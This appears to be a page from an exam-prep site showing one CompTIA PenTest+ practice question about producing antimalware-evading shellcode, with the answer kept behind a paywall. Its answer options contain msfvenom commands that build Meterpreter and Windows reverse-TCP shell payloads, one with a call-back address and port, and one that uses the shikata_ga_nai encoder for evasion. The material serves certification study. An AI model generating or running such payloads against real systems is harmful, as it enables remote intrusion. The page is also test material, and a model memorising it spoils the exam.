nerdexam
CompTIACompTIA

PT0-003 · Question #175

PT0-003 Question #175: Real Exam Question with Answer & Explanation

Sign in or unlock PT0-003 to reveal the answer and full explanation for question #175. The question stem and answer options stay visible for context.

Submitted by paula_co· Mar 6, 2026Attacks and Exploits

Question

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options

  • Amsfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload
  • Bmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
  • Cmsfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp
  • Dnet user add /administrator | hexdump > payload

Unlock PT0-003 to see the answer

You've previewed enough free PT0-003 questions. Unlock PT0-003 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.

Topics

#Payload generation#Antimalware evasion#msfvenom#Shellcode encoding
Full PT0-003 PracticeBrowse All PT0-003 Questions